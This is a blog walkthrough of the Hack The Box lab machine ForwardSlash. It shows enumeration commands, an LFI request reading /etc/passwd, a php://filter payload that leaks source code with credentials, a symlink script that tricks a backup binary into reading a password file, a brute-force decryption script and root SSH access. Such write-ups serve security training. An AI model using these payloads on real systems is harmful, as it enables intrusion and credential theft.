SecWalk.com

HTB Walkthrough ForwardSlash 10.10.10.183

Summary

Foothold

after some web enumeration we find out there is a backup site which still contains a LFI, after looking around we see there is a dev folder which contains a index.php file, in that file we were able to find credentials.

User

after successful login we still need to become another user to get more privileges we find out this user must be called pain and he owns a binary called backup, when we run that program we see it would be able to read a file when we have the right time stamp, after abusing that we were able to read a config bak file and obtain pain his credentials

Root

in pain his home folder he mentions he did encrypt something. lucky for us he did left the decrypt file so we were able to build a brute force decrypt/brute force script. after getting that passphrase we were able to mount a backup and grab the id_rsa of root.

Enumeration

Nmap

nmap -sC -sV -p- 10.10.10.183

only 2 ports open 22 and 80

Web

When visiting http://10.10.10.183 we get redirected to http://forwardslash.htb/ so let put this in our host file

This page doesn’t show much so we are now gonna use gobuster to see if there are any interesting folders or files

gobuster dir -u http://forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

a

after scanning we discover there is a note.txt which contains the following:

Pain, we were hacked by some skids that call themselves the "Backslash Gang"... I know... That name... 
Anyway I am just leaving this note here to say that we still have that backup site so we should be fine.

-chiv

So we have here 2 potential user names pain and chiv they also mention there is a backup site, now we can try use wfuzz to discover subdomains

wfuzz -u http://forwardslash.htb -H “HOST: FUZZ.forwardslash.htb ” -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt –hw 0

backup is a hit so let’s add that to our host file

New page:

we aren’t able to login with default creds but we can create our own account. now let’s login with that:

after clicking around the change your Profile Picture looks interesting cause they did disable the form:

taking a look at the source code so I know what parameter they are using:

Tuns out it is url

now let’s send this page to burp and try to use the form anyway

turns out this form is vulnerable to LFI

burp request:

POST /profilepicture.php HTTP/1.1
Host: backup.forwardslash.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1geaonp5t1c3pt937l15m24mt9
Upgrade-Insecure-Requests: 1
Content-Length: 45

url=/../../../../../../../../../../etc/passwd

after searching i couldn’t really find anything, since we didn’t scan the new vhost on hiding folders it’s time to do that now:

gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

we found a few files, also config file which contains:

//credentials for the temp db while we recover, had to backup old config, didn’t want it getting compromised -pain
define(‘DB_SERVER’, ‘localhost’);
define(‘DB_USERNAME’, ‘www-data’);
define(‘DB_PASSWORD’, ‘5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec’);
define(‘DB_NAME’, ‘site’);

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
die(“ERROR: Could not connect. ” . mysqli_connect_error());
}
?>

turns out this file doesn’t bring us anything so time to explore the dev folder

gobuster dir -u http://backup.forwardslash.htb/dev -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt

in the dev folder is only a index.php

When we try to read that file with our LFI we get the message: Permission Denied; not that way 😉

so there should be another way to read this file.

when we use a php with Base64 endo we get the file base64 encoded:

url=php://filter/convert.base64-encode/resource=dev/index.php

decode:

we found some creds:

chiv:N0bodyL1kesBack/

login with ssh:

and we are logged in.

after some enum we see pain is also a user on the box. we can read one file in his home folder which is called note.txt

Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key… I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go.

-chiv

we are also able to look into folder named encryptorinator

folder contains 2 files:

  • ciphertext
  • encryper.py

after some more enumeration we find also a note in /var/backups

Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH.

-Pain

after that we find out there is a binary called backup, which is owned by pain:

when we run this we see the following:



        Pain's Next-Gen Time Based Backup Viewer
        v0.1
        NOTE: not reading the right file yet, 
        only works if backup is taken in same second
----------------------------------------------------------------------

Current Time: 16:49:23                                                                           
ERROR: e8f539d01f643161206b6f9ff1353c05 Does Not Exist or Is Not Accessible By Me, Exiting...  

So it looks like we can read backup files when a backup is made in the same second. in /var/backups is one interesting file also owned by pain called config.php.bak

to read this file we create a file which “fools” the backup binary so we can read the file:

!/bin/bash

time=$(date +”%T”)
hash=”$(echo -n “$time” | md5sum | tr -d – > /tmp/out.txt)”
test=$(cat /tmp/out.txt)
ln -s /var/backups/config.php.bak $test
/usr/bin/backup

chmod +x secwalk.sh

./secwalk.sh


We found some creds

Current Time: 16:56:39
<?php
/* Database credentials. Assuming you are running MySQL

server with default setting (user ‘root’ with no password) */
define(‘DB_SERVER’, ‘localhost’);
define(‘DB_USERNAME’, ‘pain’);
define(‘DB_PASSWORD’, ‘db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704’);
define(‘DB_NAME’, ‘site’);

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
die(“ERROR: Could not connect. ” . mysqli_connect_error());
}
?>

pain:db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704

on first eye it looks like we found a hash but it turns out this is just pain his password

when we do sudo- l with pain we get the following:

we should be able to mount a backup. we found earlier an img file in the following folder: /var/backups/recovery/encrypted_backup.img

when we run the linux command file against it we see it’s encrypted by luks encrypted:

we should be able to unlock the image like this:

sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup

but we getting asked for a passphrase as suspected.

in pain his folder there was a note something about crypto, since this is encrypted we could try to decrypt

since we got a cipher file and the encryptor file we should be able to decrypt the cipher.

I downloaded the files to my machine and changed the encryptor.py a little bit so we could brute force

added the following to the script:

def bruteforce():
cipherfile = open(‘ciphertext’, ‘rb’)
ciphertext = cipherfile.read()
wordlist = open(‘/usr/share/wordlists/rockyou.txt’, ‘r’)
out = open(“dec.txt”, ‘w+’)
for w in wordlist:
dec = decrypt(w, ciphertext)
if “the” in dec:
print(dec.decode(errors=’ignore’))
bruteforce()

python decrypt2.py

~Uy.diWyou liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf

key: cB!6%sdH8Lj^@Y*$C2cf

now it is time run the luke command again:

sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup

cB!6%sdH8Lj^@Y*$C2cf

sudo /bin/mount /dev/mapper/backup ./mnt/

backup contains id_rsa file:

chmod 600 id_rsa

ssh -i id_rsa root@10.10.10.183

made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply